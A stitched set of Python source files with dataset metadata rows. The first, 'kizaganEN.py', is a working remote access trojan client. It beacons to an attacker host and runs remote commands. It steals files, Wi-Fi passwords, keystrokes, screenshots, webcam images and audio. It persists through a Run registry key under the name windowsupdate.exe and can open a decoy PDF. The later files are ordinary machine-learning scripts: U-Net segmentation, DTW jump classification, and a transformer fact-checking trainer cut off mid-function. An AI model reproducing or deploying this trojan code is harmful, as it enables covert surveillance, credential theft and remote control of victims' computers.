def Send_Json(self,data):
json_data = simplejson.dumps(data)
self.connection.send(json_data.encode("utf-8"))
def Get_Json(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1048576).decode()
return simplejson.loads(json_data)
except ValueError:
continue
def Get_File_Contents(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
def Save_File(self, path, content):
with open(path, "wb") as file:
file.write(base64.b64decode(content))
return "[+]The file was uploaded on victim's current directory."
def Execute_cd(self, path):
os.chdir(path)
return "[+]Changed directory to : " + path
def Make_Directory(self, file_name):
os.mkdir(file_name)
return "[+]Directory created : " + file_name
def Remove_Directory(self, file_name):
os.rmdir(file_name)
return "[+]Directory removed : " + file_name
def Remove_File(self, name):
os.remove(name)
return "[+]Removed : " + name
def Rename_File(self, name1, name2):
os.rename(name1, name2)
return "[+]Name changed.\n" + name1 + "→→→→→→" + name2
def Open_File(self, file_name):
os.system(file_name)
return "[+]The file opened on victim's computer. : " + file_name
def Pwd(self):
return os.getcwd()
def Check(self):
if os.name == 'nt':
return "Victim is a windows."
elif os.name == 'posix':
return "Victim is a linux distribution"
def Kg_Start_Func(self):
kg.kg_Start()
def Read_Kg(self):
with open(self.kg_file, "r",encoding="utf-8") as file:
return file.read()
def Talk(self,words):
engine = pyttsx3.init()
engine.setProperty("rate", 120)
engine.say(words)
engine.runAndWait()
return "[+]The sound played on victim's computer."
def Permanance(self):
if os.path.exists(self.tro_file):
return "[+]Permanance is activated already."
if not os.path.exists(self.tro_file):
shutil.copyfile(sys.executable, self.tro_file)
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + self.tro_file
subprocess.call(regedit_command,shell=True)
return "[+]Permanance activated."
def Remove_Permanance(self):
if os.path.exists(self.tro_file):
regedit_command = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /f"
subprocess.call(regedit_command,shell=True)
os.remove(self.tro_file)
return "[+]Permanance removed and it will not work every time the victim boots up his computer."
else:
return "[+]Permanance not found."
def Start_Record(self):
self.start = sound_record.Recording()
self.start.Start_Record()
def Chat_Send_Messages(self):
message = self.client_message_entry.get()
self.messages.insert(tkinter.END, "\n" + "You:" + message)
self.chat_connection.send(message.encode())
self.messages.see("end")
def Chat_Get_Messages(self):
while True:
message = self.chat_connection.recv(1024).decode()
if message == "exit":
self.chat_gui.destroy()
self.messages.insert(tkinter.END, "\n" + "Hacker:" + message)
self.messages.see("end")
def Chat(self):
self.chat_connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.chat_connection.connect((ip,self.chat_port))
self.chat_gui = tkinter.Tk()
self.chat_gui.resizable(False, False)
self.chat_gui.config(bg="#D9D8D7")
self.chat_gui.geometry("600x300")
self.chat_gui.title("You are chatting with hacker.")
self.messages = tkinter.Text(self.chat_gui, width=71, height=10, fg="#0E6B0E", bg="#000000")
self.messages.place(x=0, y=0)
self.messages.insert("1.0","Hacker wants to chat with you.Write your message 'your message' part and click the 'Send Message'.")
self.your_message_label = tkinter.Label(self.chat_gui, width=20, text="Your Message :", fg="#0D1C6E")
self.your_message_label.place(x=-30, y=250)
self.client_message_entry = tkinter.Entry(self.chat_gui, width=50)
self.client_message_entry.place(x=90, y=250)
self.send_button = tkinter.Button(self.chat_gui, width=20, text="Send Message", command=self.Chat_Send_Messages, bg="#000000", fg="#0E6B0E")
self.send_button.place(x=400, y=245)
self.chat_thread = threading.Thread(target=self.Chat_Get_Messages)
self.chat_thread.start()
self.chat_gui.mainloop()
def Client_Start(self):
while True:
command = self.Get_Json()
try:
if command[0] == "cd" and len(command) > 1:
command_output = self.Execute_cd(command[1])
elif command[0] == "download":
command_output = self.Get_File_Contents(command[1])
elif command[0] == "upload":
command_output = self.Save_File(command[1], command[2])
elif command[0] == "mkdir":
command_output = self.Make_Directory(command[1])
elif command[0] == "rmdir":
command_output = self.Remove_Directory(command[1])
elif command[0] == "rm":
command_output = self.Remove_File(command[1])
elif command[0] == "rename":
command_output = self.Rename_File(command[1], command[2])
elif command[0] == "open":
command_output = self.Open_File(command[1])
elif command[0] == "pwd":
command_output = self.Pwd()
elif command[0] == "system":
command_output = self.Check()
elif command[0] == "read_kg":
command_output = self.Read_Kg()
elif command[0] == "talk":
command_output = self.Talk(command[1:])
elif command[0] == "show_wifis":
wifis = subprocess.check_output(["netsh", "wlan", "show", "profiles"]).decode()
wifi = wifis.split("\n")
profiles = [i.split(":")[1][1:-1] for i in wifi if "All User Profile" in i]
profile_str = " ".join(profiles)
command_output = "Wifi Networks : \n\n\n"
command_output +=profile_str + "\n\n\n"
command_output += "Wifi passwords(in order of) :\n\n"
for i in profiles:
try:
result = subprocess.check_output(["netsh", "wlan", "show", "profile", i, "key=clear"]).decode("utf-8").split("\n")
result = [b.split(":")[1][1:-1] for b in result if "Key Content" in b]
result_str = " ".join(result)
if result_str == "":
result_str = "No password"
command_output += "\t" + result_str
except subprocess.CalledProcessError:
print("Error.")
elif command[0] == "get_ss":
ImageGrab.grab().save(self.ss_file)
command_output=self.Get_File_Contents(self.ss_file)
os.remove(self.ss_file)
elif command[0] == "save_kg":
command_output = self.Get_File_Contents(self.kg_file)
os.remove(self.kg_file)
elif command[0] == "permanance":
command_output = self.Permanance()
elif command[0] == "remove_permanance":
command_output = self.Remove_Permanance()
elif command[0] == "get_camera_image":
camera = cv2.VideoCapture(0)
result, image = camera.read()
if result:
cv2.imwrite(self.camera_file,image)
command_output = self.Get_File_Contents(self.camera_file)
os.remove(self.camera_file)
else:
command_output = "[-]Can not reach the camera."
elif command[0] == "download_sound_recording":
self.start.Stop_Record()
command_output = self.Get_File_Contents(self.sound_file)
os.remove(self.sound_file)
elif command[0] == "chat":
self.Chat()
else:
command_output = self.Execute_Command(command)
except Exception:
command_output = "Unknown command.For command list use 'help' command."
self.Send_Json(command_output)
self.connection.close()
def Try_Connection():
while True:
time.sleep(5)
try:
mysocket = mySocket(ip,port)
mysocket.Client_Start()
except Exception:
Try_Connection()
def Permanance():
tro_file = os.environ["appdata"] + "\\windowsupdate.exe"
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + tro_file
if not os.path.exists(tro_file):
shutil.copyfile(sys.executable,tro_file)
subprocess.call(regedit_command,shell=True)
if os.path.exists(tro_file):
pass
def Open_Added_File():
added_file = sys._MEIPASS + "\\examplefile.pdf" #Enter the file after '\\' to combine with image,pdf etc.
subprocess.Popen(added_file,shell=True)
#Open_Added_File() # And remove the '#' before the code.(If you activated it.)
Permanance()
Try_Connection()
| st4inl3s5/kizagan | kizaganEN.py | kizaganEN.py | py | 11,980 | python | en | code | 72 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "util.kg.kg_Start",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "util.kg",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "socket.socket",
"l... |
16931221429 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 23:39:39 2018
@author: yorklk
"""
import os
import numpy as np
from skimage.morphology import label
from keras.models import Model, load_model
from keras.layers import Input, Activation, Add, BatchNormalization
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D, Conv2DTranspose
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import concatenate
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.applications.mobilenet import MobileNet
import keras.backend as KB
import tensorflow as tf
X_train = np.load('data/X_128.npy')
Y_train = np.load('data/Y_128.npy')
X_test = np.load('data/test_128.npy')
np.random.seed(seed = 71)
epochs = 500
learning_rate = 1e-3
learning_rates = [1e-3]
decay = 5e-5
patience = 15
dropout_rate = 0.015
batch_size = 8
K=4
pre_proc = dict(horizontal_flip = True,
vertical_flip = True,
width_shift_range = 0.1,
height_shift_range = 0.1,
channel_shift_range= 0.0,
zoom_range = 0.0,
rotation_range = 0.0)
####################################################################
# Precision helper function
def precision_at(threshold, iou):
matches = iou > threshold
true_positives = np.sum(matches, axis=1) == 1
false_positives = np.sum(matches, axis=0) == 0
false_negatives = np.sum(matches, axis=1) == 0
tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)
return tp, fp, fn
def iou_metric(y_true_in, y_pred_in):
labels = label(y_true_in > 0.5)
y_pred = label(y_pred_in > 0.5)
true_objects = len(np.unique(labels))
pred_objects = len(np.unique(y_pred))
intersection = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=(true_objects, pred_objects))[0]
# Compute areas
area_true = np.histogram(labels, bins = true_objects)[0]
area_pred = np.histogram(y_pred, bins = pred_objects)[0]
area_true = np.expand_dims(area_true, -1)
area_pred = np.expand_dims(area_pred, 0)
# Compute union
union = area_true + area_pred - intersection
# Exclude background from the analysis
intersection = intersection[1:,1:]
union = union[1:,1:]
union[union == 0] = 1e-9
# Compute the intersection over union
iou = intersection / union
# Loop over IoU thresholds
prec = []
for t in np.arange(0.5, 1.0, 0.05):
tp, fp, fn = precision_at(t, iou)
if (tp + fp + fn) > 0:
p = tp / (tp + fp + fn)
else:
p = 0
prec.append(p)
return np.mean(prec)
def iou_metric_batch(y_true_in, y_pred_in):
batch_size = y_true_in.shape[0]
metric = []
for batch in range(batch_size):
value = iou_metric(y_true_in[batch], y_pred_in[batch])
metric.append(value)
return np.array(np.mean(metric), dtype=np.float32)
def my_iou_metric(label, pred):
metric_value = iou_metric_batch(label, pred)
return metric_value
#########################################################################################################
def identity_block(X, filters, dropout_rate):
F1, F2, F3 = filters
# First component
X = Conv2D(F1, kernel_size = (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Second component
X = Conv2D(F2, (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Third component
X = Conv2D(F3, (1,1), strides = (1,1), padding = 'valid')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
return X
def deconvolution_block(X, filters, dropout_rate):
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
# First component, deconvolution
X = Conv2DTranspose(F1,
(2, 2),
strides=(2, 2),
padding='same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Second component
X = Conv2D(F2, (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Third component
X = Conv2D(F3, (1,1), strides = (1,1), padding = 'valid')(X)
X = BatchNormalization(axis = 3)(X)
# Shortcut deconvolution
X_shortcut = Conv2DTranspose(F3,
(2, 2),
strides=(2, 2),
padding='same')(X_shortcut)
X_shortcut = BatchNormalization(axis = 3)(X_shortcut)
# Add shortcut value to main path, and ELU activation
X = Add()([X_shortcut, X])
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
return X
def uNet_Model(input_shape = (128, 128, 3), dropout_rate = dropout_rate):
'''
uNet with MobileNet (pretrained on imagenet) as downsampling side
Outputs saved from five layers to concatenate on upsampling side:
activations at conv_pw_1, conv_pw_3, conv_pw_5, conv_pw_11, conv_pw_13
ResNet convolution blocks with Conv2DTranspose and elu used for upsampling side
'''
base_model = MobileNet(weights = 'imagenet',
include_top = False,
input_shape = (128, 128, 3))
# Base model, with 5 layers out
X1 = base_model.get_layer('conv_pw_1_relu').output # 64x64, 64 filters
X2 = base_model.get_layer('conv_pw_3_relu').output # 32x32, 128 filters
X3 = base_model.get_layer('conv_pw_5_relu').output # 16x16, 256 filters
X4 = base_model.get_layer('conv_pw_11_relu').output # 8x8, 512 filters
X5 = base_model.get_layer('conv_pw_13_relu').output # 4x4, 1024 filters
# Bottom block
X = identity_block(X5, filters = [256, 256, 1024], dropout_rate = dropout_rate) # 4x4
X = Add()([X, X5]) # 4x4
# Deconvolution block 1
X = deconvolution_block(X, filters = [128, 128, 512], dropout_rate = dropout_rate) # 8x8
X = Add()([X, X4]) # 8x8
# Deconvolution block 2
X = deconvolution_block(X, filters = [64, 64, 256], dropout_rate = dropout_rate) # 16x16
X = Add()([X, X3]) # 16x16
# Deconvolution block 3
X = deconvolution_block(X, filters= [32, 32, 128], dropout_rate = dropout_rate) # 32x32
X = Add()([X, X2]) # 32x32
# Deconvolution block 4
X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 64x64
X = Add()([X, X1]) # 64x64
# Final deconvolution block
X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 128x128
predictions = Conv2D(1, (1, 1), activation='sigmoid')(X)
model = Model(input = base_model.input, output = predictions)
return model
#####################################################################################################
def train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size, train_generator, file_path):
# Train model using Adam optimizer and early stopping
model = uNet_Model(input_shape=(128, 128, 3), dropout_rate = parameters['dropout_rate'])
model.compile(loss='binary_crossentropy',
optimizer=Adam(lr = parameters['learning_rate'], decay = parameters['decay']),
metrics=['accuracy'])
model.fit_generator(generator = train_generator,
steps_per_epoch = int(X_train_cv.shape[0]/batch_size),
epochs = epochs,
shuffle = True,
verbose = 2,
validation_data = (X_dev, Y_dev),
validation_steps = int(X_train_cv.shape[0]/batch_size),
callbacks = [EarlyStopping('val_loss', patience=parameters['patience'], mode="min"),
ModelCheckpoint(file_path, save_best_only=True)])
return model
def get_folds(X_train, Y_train, K):
# Shuffles data then returns K folds of X,Y-train, X,Y-dev
folds = []
m = X_train.shape[0]
permutation = list(np.random.permutation(m))
X_shuffled = X_train[permutation, :, :, :]
Y_shuffled = Y_train[permutation, :, :, :]
fold_length = int(m/K)
for j in range(K):
cv_idx = list(range(j*fold_length, (j+1)*fold_length))
train_idx = list(range(0, j*fold_length)) + list(range((j+1)*fold_length, m))
X_train_cv = X_shuffled[train_idx, :, :, :]
Y_train_cv = Y_shuffled[train_idx, :, :, :]
X_dev = X_shuffled[cv_idx, :, :, :]
Y_dev = Y_shuffled[cv_idx, :, :, :]
fold = [X_train_cv, Y_train_cv, X_dev, Y_dev]
folds.append(fold)
return folds
def get_file_path(j, parameters, directory):
print('\nFold:\t{}\nlearning_rate:\t{learning_rate}\ndropout_rate:\t{dropout_rate}\naugmentation:\t{aug}'.format(str(j), **parameters))
if not os.path.exists(directory):
os.makedirs(directory)
file_path = directory + '/weights_'+str(j)+'.hdf5'
return file_path
def rename_weight_path(j, metrics, file_path, directory):
print('\nFold:\t{}\nTrain Loss:\t{train_loss:.4}\nDev Loss:\t{dev_loss:.4}\nMean IoU:\t{IoU:.4}\n'.format(str(j), **metrics))
new_weight_path = '{}_{}_{dev_loss:.4}_{IoU:.4}{hdf5}'.format('/weights', str(j), **metrics)
os.rename(file_path, directory + new_weight_path)
return
def print_final_metrics(parameters, metrics, directory):
print('\n\nlearning_rate: {learning_rate}\ndropout_rate: {dropout_rate}\naugmentation: {aug}'.format(**parameters))
print('avg_dev_loss:\t{avg_dev_loss}\nmean_IoU:\t{IoU_log}\n\n\n'.format(**metrics))
name = 'loss={avg_dev_loss:.6}_IoU={IoU_log:.6}'.format(**metrics)
new_path = directory+'--'+name
os.rename(directory, new_path)
return
def get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics):
# Load the best model weights saved by early stopping
K = metrics['K']
model.load_weights(filepath=file_path)
# Get train and dev loss
train_eval = model.evaluate(X_train_cv, Y_train_cv, verbose=0)
metrics['train_loss'] = train_eval[0]
dev_eval = model.evaluate(X_dev, Y_dev, verbose=0)
metrics['dev_loss'] = dev_eval[0]
metrics['avg_dev_loss'] += metrics['dev_loss']/K
# Get Intersection over Union
preds_dev = model.predict(X_dev)
Y_pred = preds_dev >= 0.5
Y_true = Y_dev
IoU = my_iou_metric(Y_true, Y_pred)
metrics['IoU'] = IoU
metrics['IoU_log'] += IoU/K
return metrics
############################################################################
for learning_rate in learning_rates:
aug = ''
if pre_proc['width_shift_range'] != 0.0:
aug += '_{}={width_shift_range}'.format(aug, 'shift', **pre_proc)
if pre_proc['zoom_range'] != 0.0:
aug += '_{}={zoom_range}'.format(aug, 'zoom', **pre_proc)
if pre_proc['rotation_range'] != 0.0:
aug += '_{}={rotation_range}'.format(aug, 'rotation', **pre_proc)
if pre_proc['horizontal_flip']:
aug += '_{}={horizontal_flip}'.format(aug, 'h-flip', **pre_proc)
if pre_proc['vertical_flip']:
aug += '_{}={vertical_flip}'.format(aug, 'v-flip', **pre_proc)
parameters = {'learning_rate':learning_rate, 'dropout_rate':dropout_rate, 'aug':aug, 'decay':decay, 'patience':patience}
directory = 'model_5/{learning_rate}_{dropout_rate}/{aug}'.format(**parameters)
metrics = {'train_loss': 0, 'dev_loss': 0, 'avg_dev_loss': 0, 'IoU': 0, 'IoU_log': 0, 'K': K,
'hdf5': '.hdf5'}
# Create image and mask data generators for preprocessing
image_datagen = ImageDataGenerator(**pre_proc)
mask_datagen = ImageDataGenerator(**pre_proc)
image_datagen.fit(X_train, augment = True)
mask_datagen.fit(Y_train, augment = True)
image_generator = image_datagen.flow(X_train,
batch_size = batch_size)
mask_generator = mask_datagen.flow(Y_train,
batch_size = batch_size)
train_generator = zip(image_generator, mask_generator)
# Create folds and train
folds = get_folds(X_train, Y_train, K)
for j in range(K):
X_train_cv = folds[j][0]
Y_train_cv = folds[j][1]
X_dev = folds[j][2]
Y_dev = folds[j][3]
file_path = get_file_path(j, parameters, directory)
model = train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size,
train_generator, file_path)
metrics = get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics)
rename_weight_path(j, metrics, file_path, directory)
print_final_metrics(parameters, metrics, directory)
| yorklk/dsb2018-U-Net | U-Net.py | U-Net.py | py | 13,208 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number... |
8293997114 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 17 13:44:46 2021
@author: bfeng1
"""
import json
import sys
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
from scipy.signal import savgol_filter
from sklearn.utils import resample
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from scipy.stats import mode
from scipy.spatial.distance import squareform
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
#%%
class jump:
n = 135
r = 5
def __init__(self, name, jump_cycle):
self.name = name
self.jump_cycle = jump_cycle
def csv2df(self):
csv_file = 'csv_files/'+self.name + '.csv'
df = pd.read_csv(csv_file)
# cleaning the dataset(drop the rows with ratio is higher than 2.25)
df['left angle ratio'] = df['Angle1']/df['Angle3']
df.drop(df[df['left angle ratio']>2.25].index, inplace = True)
df.drop(df[df['left angle ratio']<0.75].index, inplace = True)
df['smoothed'] = savgol_filter(df['left angle ratio'], 25, 2)
return df
def finetune(self):
df = jump.csv2df(self)
jump_cycle = self.jump_cycle
new_results = []
for domain in jump_cycle:
current_list = []
for inx in domain:
start = inx - jump.r
end = inx + jump.r
temp = df[start:end]
max_val = temp['left angle ratio'].max()
ind = temp[temp['left angle ratio'] == max_val].index.values.astype(int)
try:
ind = ind[0]
except:
ind = 0
current_list.append(ind)
new_results.append(current_list)
check = (jump_cycle == new_results)
if check is False:
print('old cycle {}: {}'.format(self.name, jump_cycle))
print('new cycle {}: {}'.format(self.name, new_results))
elif check is True:
print('The jump cycle has been finetuned')
return new_results
def resample_df(self):
df_list = []
jump_cycle = self.jump_cycle
df = jump.csv2df(self)
for i in range(len(jump_cycle)):
temp = df[jump_cycle[i][0]:jump_cycle[i][1]]
resample_data = resample(temp, n_samples = jump.n, replace = False, random_state = 0).sort_index()
# resample_data: resampled dataframe
resample_data = resample_data.reset_index()
df_list.append(resample_data)
# create plots with resampled data
return df_list
def vis(self):
df_list = jump.resample_df(self)
a = (len(df_list)+1)//2
b = 2
plt.figure(figsize = (14,22))
for i in range(len(df_list)):
plt.subplot(a,b,i+1)
plt.title('subplots {}{}{} : cycle {}'.format(a,b,i+1,i+1))
plt.xlabel('frame number')
plt.ylabel('Left angle ratio')
sns.scatterplot(data = df_list[i], x = df_list[i].index, y = 'left angle ratio')
sns.lineplot(data = df_list[i], x = df_list[i].index, y = 'smoothed')
print('the process is done for the jump {}'.format(self.name))
# #%%
# # create lists to store the names of csv files
# # create jump cycle(manually select range, then autocorrect by algorithm)
# good_jump_cycle = [[154,309],[398,539],[651,786],[825,980],[1018,1158],[1188,1337],[1374,1524],[1555,1698],[1737,1881],[1895,2054]]
# # cycle1: [010262,010456], [010469, 010638], [010655,010821],[010829,010998],[010998,011163],[011168,011331], [011331, 011497],[011497,011659],[011670,011849],[011849,012015]
# inner_jump_cycle=[ [397,562],[562,742],[742,902],[902,1060],[1060,1232],[1232,1398],[1398,1583],[1583,1760]]
# # cycle1: [001550,001700], [001716, 001902], [001930,002095],[002128,002300],[002330,002520],[002540,002709], [002729, 002900],[002916,003078],[003085,03249]
# outer_jump_cycle = [[379,552],[579,767],[767,973],[991,1171],[1171,1351],[1364,1527],[1543,1697]]
#%%
class KnnDtw(object):
"""K-nearest neighbor classifier using dynamic time warping
as the distance measure between pairs of time series arrays
Arguments
---------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for KNN
max_warping_window : int, optional (default = infinity)
Maximum warping window allowed by the DTW dynamic
programming function
subsample_step : int, optional (default = 1)
Step size for the timeseries array. By setting subsample_step = 2,
the timeseries length will be reduced by 50% because every second
item is skipped. Implemented by x[:, ::subsample_step]
"""
def __init__(self, n_neighbors=5, max_warping_window=10000, subsample_step=1):
self.n_neighbors = n_neighbors
self.max_warping_window = max_warping_window
self.subsample_step = subsample_step
def fit(self, x, l):
"""Fit the model using x as training data and l as class labels
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Training data set for input into KNN classifer
l : array of shape [n_samples]
Training labels for input into KNN classifier
"""
self.x = x
self.l = l
def _dtw_distance(self, ts_a, ts_b, d = lambda x,y: abs(x-y)):
"""Returns the DTW similarity distance between two 2-D
timeseries numpy arrays.
Arguments
---------
ts_a, ts_b : array of shape [n_samples, n_timepoints]
Two arrays containing n_samples of timeseries data
whose DTW distance between each sample of A and B
will be compared
d : DistanceMetric object (default = abs(x-y))
the distance measure used for A_i - B_j in the
DTW dynamic programming function
Returns
-------
DTW distance between A and B
"""
# Create cost matrix via broadcasting with large int
ts_a, ts_b = np.array(ts_a), np.array(ts_b)
M, N = len(ts_a), len(ts_b)
cost = sys.maxsize * np.ones((M, N))
# Initialize the first row and column
cost[0, 0] = d(ts_a[0], ts_b[0])
for i in range(1, M):
cost[i, 0] = cost[i-1, 0] + d(ts_a[i], ts_b[0])
for j in range(1, N):
cost[0, j] = cost[0, j-1] + d(ts_a[0], ts_b[j])
# Populate rest of cost matrix within window
for i in range(1, M):
for j in range(max(1, i - self.max_warping_window),
min(N, i + self.max_warping_window)):
choices = cost[i - 1, j - 1], cost[i, j-1], cost[i-1, j]
cost[i, j] = min(choices) + d(ts_a[i], ts_b[j])
# Return DTW distance given window
return cost[-1, -1]
def _dist_matrix(self, x, y):
"""Computes the M x N distance matrix between the training
dataset and testing dataset (y) using the DTW distance measure
Arguments
---------
x : array of shape [n_samples, n_timepoints]
y : array of shape [n_samples, n_timepoints]
Returns
-------
Distance matrix between each item of x and y with
shape [training_n_samples, testing_n_samples]
"""
# Compute the distance matrix
dm_count = 0
# Compute condensed distance matrix (upper triangle) of pairwise dtw distances
# when x and y are the same array
if(np.array_equal(x, y)):
x_s = np.shape(x)
dm = np.zeros((x_s[0] * (x_s[0] - 1)) // 2, dtype=np.double)
for i in range(0, x_s[0] - 1):
for j in range(i + 1, x_s[0]):
dm[dm_count] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
dm_count += 1
# Convert to squareform
dm = squareform(dm)
return dm
# Compute full distance matrix of dtw distnces between x and y
else:
x_s = np.shape(x)
y_s = np.shape(y)
dm = np.zeros((x_s[0], y_s[0]))
for i in range(0, x_s[0]):
for j in range(0, y_s[0]):
dm[i, j] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
# Update progress bar
dm_count += 1
return dm
def predict(self, x):
"""Predict the class labels or probability estimates for
the provided data
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Array containing the testing data set to be classified
Returns
-------
2 arrays representing:
(1) the predicted class labels
(2) the knn label count probability
"""
dm = self._dist_matrix(x, self.x)
# Identify the k nearest neighbors
knn_idx = dm.argsort()[:, :self.n_neighbors]
# Identify k nearest labels
knn_labels = self.l[knn_idx]
# Model Label
mode_data = mode(knn_labels, axis=1)
mode_label = mode_data[0]
mode_proba = mode_data[1]/self.n_neighbors
return mode_label.ravel(), mode_proba.ravel()
#%%
good = ['good1', 'good2','good4','good6']
inner = ['inner1', 'inner2', 'inner3']
outer= ['outer1', 'outer2']
with open('list_info.txt','r') as file:
input_lines = [line.strip() for line in file]
all_csv = good+inner+outer
info = {}
info['name'] = all_csv
info['cycle'] = input_lines
#%%
# structure dataset for algorithm training
good_dataset = []
inner_dataset = []
outer_dataset = []
n = 135
for i in range(len(all_csv)):
temp = jump(info['name'][i], json.loads(info['cycle'][i]))
# temp.finetune()
# temp.vis(n)
if i < len(good):
good_dataset += temp.resample_df()
elif i < len(good+inner):
inner_dataset += temp.resample_df()
else:
outer_dataset += temp.resample_df()
total_x = good_dataset+inner_dataset+outer_dataset
for i in range(len(total_x)):
total_x[i]['series_id'] = i
X = pd.concat(total_x)
#%%
# compare time series signal for good jump and bad (inner+outer) jump
# load the label file
y = pd.read_csv('csv_files/lable.csv')
label_encoder = LabelEncoder()
encoded_labels = label_encoder.fit_transform(y.jump)
y['label'] = encoded_labels
#%%
# create feature column
feature_columns = X.columns.tolist()[2:]
# construct sequence
sequences = []
for series_id, group in X.groupby('series_id'):
sequence_features = group[feature_columns]
label = y[y.series_id == series_id].iloc[0].label
sequences.append((sequence_features, label))
def create_data(sequences, test_size = 0.2):
train_sequences, test_sequences = train_test_split(sequences, test_size = 0.2)
train_X = np.empty(shape = (len(train_sequences),135), dtype = 'object')
train_y = []
test_X = np.empty(shape = (len(test_sequences),135), dtype = 'object')
test_y = []
for i in range(len(train_sequences)):
temp_x = train_sequences[i][0]['left angle ratio'].to_list()
train_X[i][:] = temp_x
train_y.append(train_sequences[i][1])
for i in range(len(test_sequences)):
temp_x = test_sequences[i][0]['left angle ratio'].to_list()
test_X[i][:] = temp_x
test_y.append(test_sequences[i][1])
train_y = np.array(train_y)
test_y = np.array(test_y)
return train_X, test_X, train_y, test_y
#%%
iten = 20
score = 0
score_list = []
false_negative_rate = []
false_positive_rate = []
for i in range(iten):
m = KnnDtw(n_neighbors=1, max_warping_window=15)
train_X, test_X, train_y, test_y = create_data(sequences)
m.fit(train_X, train_y)
label, proba = m.predict(test_X)
temp_score = accuracy_score(label,test_y)
tn, fp, fn, tp = confusion_matrix(test_y, label).ravel()
false_positive_rate.append(fp/(fp+tn))
false_negative_rate.append(fn/(fn + tp))
score_list.append(temp_score)
score += temp_score
print('the accuracy of the classifier: {}%'.format(score/iten*100))
print('false positive rate: {}'.format(np.mean(false_positive_rate)))
print('false negative rate: {}'.format(np.mean(false_negative_rate)))
| bfeng1/Jump-Classification-Project | aim2.py | aim2.py | py | 12,898 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "scipy.signal.savgol_filter",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.resample",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "mat... |
12118485844 | """Training a Transformer Builder model to be used for adversarial attacks."""
import argparse
import random
from functools import partial
from typing import Dict
import numpy as np
import torch
from sklearn.metrics import precision_recall_fscore_support, confusion_matrix
from torch.utils.data.sampler import BatchSampler
from tqdm import tqdm
from transformers import AdamW, get_constant_schedule_with_warmup
from transformers import BertForSequenceClassification
from transformers import BertTokenizer, BertConfig
from transformers import RobertaForSequenceClassification, RobertaConfig, \
RobertaTokenizer
from builders.data_loader import collate_fever, FeverDataset, \
BucketBatchSampler, sort_key
def train_model(model: torch.nn.Module,
train_dl: BatchSampler, dev_dl: BatchSampler,
optimizer: torch.optim.Optimizer,
scheduler: torch.optim.lr_scheduler.LambdaLR,
n_epochs: int) -> (Dict, Dict):
best_val, best_model_weights = {'val_f1': 0}, None
for ep in range(n_epochs):
for i, batch in enumerate(tqdm(train_dl, desc='Training')):
model.train()
optimizer.zero_grad()
loss, _ = model(batch[0],
attention_mask=batch[
0] !=
tokenizer.pad_token_id,
labels=batch[1])
loss.backward()
optimizer.step()
scheduler.step()
if i in [600, 700, 100]:
print(eval_model(model, dev_dl), flush=True)
val_p, val_r, val_f1, val_loss = eval_model(model, dev_dl)
current_val = {
'val_f1': val_f1,
'val_p': val_p,
'val_r': val_r,
'val_loss': val_loss,
'ep': ep
}
print(current_val, flush=True)
if current_val['val_f1'] > best_val['val_f1']:
best_val = current_val
best_model_weights = model.state_dict()
return best_model_weights, best_val
def eval_model(model: torch.nn.Module, test_dl: BatchSampler):
model.eval()
loss_f = torch.nn.CrossEntropyLoss()
with torch.no_grad():
labels_all = []
logits_all = []
losses = []
